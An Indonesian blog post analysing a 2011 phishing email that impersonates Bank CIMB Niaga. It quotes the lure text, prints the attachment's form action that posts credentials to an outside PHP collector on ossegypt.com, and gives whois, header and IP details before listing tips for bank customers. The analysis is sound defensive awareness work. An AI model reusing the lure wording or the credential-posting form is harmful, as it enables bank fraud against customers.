Penipuan online (phising) mengatasnamakan bank swasta terkenal di Indonesia kembali muncul dengan format yang berbeda. Bila Anda mendapatkan email dari bank, dan isinya memberitahukan untuk verifikasi data, atau apapun yang sifatnya memberikan informasi yang sifatnya rahasia seperti username, password, nomor account, dan biasanya ditambahkan nama ibu kandung ataupun alamat serta data lain untuk verifikasi, hendaknya berpikir ulang.
Kemarin pada inbox ada sebuah email yang mengatasnamakan Bank CIMB NIAGA yang berisi sebuah himbauan keamanan, sejenak tau kalau ini adalah email yang tergolong phising. Metode yang digunakan sangat sederhana, yaitu memanfaatkan ketidaktauan masyarakat umum tentang internet.
Berikut kutipan lengkap isi emailnya:
From: CIMB NIAGA (clicks@clicks.com)
To: undisclosed-recipients
Subject: Mengamankan account Anda
Perhatian CIMB Pelanggan,
Kami telah memperhatikan bahwa penipu menggunakan cara baru dan canggih untuk mencuri uang dari rekening nasabah Bank CIMB ‘dan karena ini, kami telah meluncurkan langkah-langkah keamanan baru dan canggih untuk mencegah uang dicuri dari rekening pelanggan kami.
Untuk program ini akan efektif pada profil Anda, Anda diminta untuk men-download file terlampir dan ikuti instruksi. Catatan bahwa ini aktivasi keamanan gratis dan wajib sebagai kegagalan untuk melakukan hal ini akan menghasilkan suspensi sementara pada profil online Anda sebagai CIMB tidak akan bertanggung jawab jika uang ada sesuatu yang diambil dari account Anda.
Download file terlampir untuk terus dan tidak diabaikan.
salam
bagian penerangan
CIMB Niaga
Email itu berisi sebuah attachment dengan extension MHT (Web Archive, single file) dengan nama ‘CIMB Clicks Verify.mht’ Attachment ini bukan sebuah virus ataupun trojan, melainkan kompresi dari sebuah halaman web. Bila attachment diklik, akan menampilkan web seperti ini, tampilannya sangat meyakinkan.
Secara kasat mata, email ini sangat mencurigakan, karena:
1. Dikirim bukan dengan domain pemilik bank
2. Ditujukan bukan ke alamat konsumen
3. Perhatikan kalimat yang digunakan pada email, cenderung merupakan terjemahan dari bahasa lain ke bahasa indonesia.
4. Ketika attachment dibuka, tampilan tidak menunjukkan alamat asli dari bank tersebut.
5. Image banner yang ada sudah ketinggalan beritanya, karena masih ditampilkan banner saat bulan puasa (kemungkinan web tersebut diambil saat bulan puasa)
Secara teknis, kita bisa melihat lebih jauh lagi.
1. Secara umum, halaman web yang ditampilkan bukan https://domainbank, melainkan alamat lokal komputer sendiri, contohnya:
C:\Users\yudhi.kukuh\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QNWPPWGZ\CIMB Clicks Verify.mht
Sangat aneh sebuah form resmi bukan dari web pemilik bank
2. Saat view source dari attachment tersebut, yang harus dicari pertama kali adalah command FORM, dan didapatkan:
<form action=”http://ossegypt.com/img/cimb/logininfo.php” method=”post”>
Yang berarti: form pada halaman tersebut akan diproses pada alamat http://ossegypt.com/img/cimb/logininfo.php dan lagi-lagi bukan alamat pemilik bank
3. Saat dilakukan checking IP utk domain ossegypt.com didapatkan IP 66.96.160.131 yang setelah ditraceroute diketahui berasal dariserver hosting di luar indonesia.
4. Pemilik Domain ossegypt.com telah mendaftarkan domainnya agar identitasnya terprotek, berikut hasil whois:
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.Registrant:
Contact Privacy Inc. Customer 0126894480
96 Mowat Ave
Toronto, ON M6K 3M1
CADomain name: OSSEGYPT.COM
Administrative Contact:
Contact Privacy Inc. Customer 0126894480, ossegypt.com@contactprivacy.com
96 Mowat Ave
Toronto, ON M6K 3M1
CA
+1.4165385457
Technical Contact:
Contact Privacy Inc. Customer 0126894480, ossegypt.com@contactprivacy.com
96 Mowat Ave
Toronto, ON M6K 3M1
CA
+1.4165385457
Registration Service Provider:
Netfirms, Inc., support@netfirms.com
+1.8663174678
+1.7812722915 (fax)
http://netfirms.com
This company may be contacted for domain login/passwords,
DNS/Nameserver changes, and general domain support questions.
Registrar of Record: TUCOWS, INC.
Record last updated on 20-Mar-2011.
Record expires on 31-Oct-2011.
Record created on 31-Oct-2010.
Registrar Domain Name Help Center:
http://tucowsdomains.com
Domain servers in listed order:
NS1.NETFIRMS.COM
NS2.NETFIRMS.COM
Domain status: clientDeleteProhibited
clientTransferProhibited
clientUpdateProhibited
This domain’s privacy is protected by contactprivacy.com. To reach the domain contacts, please go to http://www.contactprivacy.com and follow the instructions.
5. Jika domain tersebut kita akses, maka dapat diketahui bahwa account hostingnya telah dihentikan, nampaknya perusahaan hosting tersebut sudah melakukan tindakan.
walau tahu bahwa ini adalah phising, sempat mencoba untuk melakukan login dengan username dan password dikosongkan, hasilnya error karena hosting sudah dihentikan.
6. Berikut Headernya:
Received: from unknown (HELO cablebahamas.net) ([65.75.98.202])
by smtp3.coralwave.com with ESMTP; 03 Oct 2011 06:52:12 -0400
Received: from dummy.name; Mon, 03 Oct 2011 06:40:14 -0400
From: “CIMB NIAGA”<clicks@clicks.com>
Subject: Mengamankan account Anda
X-Eset-AntiSpam: HOLD;86;calc;2011-10-03 17:41:51;1110031741514643;396F
Date: Mon, 3 Oct 2011 03:40:14 -0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”—-=_NextPart_000_0061_01C2A9A6.373D99CE”
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-ID: <auto-000041898903@fe2.cablebahamas.net>
To: undisclosed-recipients:;
X-EsetId: 99E756210EAE7630CBA707
Dapat dilihat bahwa email dikirimkan dari ip 65.75.98.202
Dari kasus ini, ada beberapa hal yang dapat diamati dari metode phising yang digunakan:
1. Menggunakan metode yang paling sederhana, mengirimkan form agar diisi
2. Menggunakan domain pengirim (clicks.com) yang menyerupai domain aslinya (cimbclicks.co.id)
3. Menggunakan sarana email untuk penyebaran
4. Memanfaatkan ketidaktahuan masyarakat awam dalam hal keamanan berinternet
Beberapa tips yang patut dicermati dalam menerima email tentang keamanan dari Bank:
1. Bank tidak pernah meminta melakukan verifikasi data melalui email
2. Perhatikan bahwa untuk keamanan akses, bank akan menggunakan HTTPS dibandingkan HTTP
3. Semua form dilakukan melalui domain bank tersebut
4. Nama dan email tujuan tertulis jelas, karena bank memiliki data kita
5. Untuk pemilik domain, disarankan menggunakan HTTPS (SSL) yang dilengkapi EV (Extended Validation) sehingga nama perusahaan pemilik SSL akan tercantum pada ‘address bar’
6. Jika attachment berupa file berakhiran (extension) .EXE atau .COM besar kemungkinan merpakan virus/trojan
7. Ketik alamat web bank yang akan kita akses dengan benar, jika perlu gunakan Bookmark agar tidak mengalami kesalahan tulis
8. Segera ganti password anda dari web resmi bank tersebut bila sudah terlanjur mengisi formulir palsu
9. Jika kita tidak pernah menabung pada bank tersebut, berarti jelas email tersebut salah sasaran dan jangan berharap banyak, lekas abaikan email tersebut 🙂
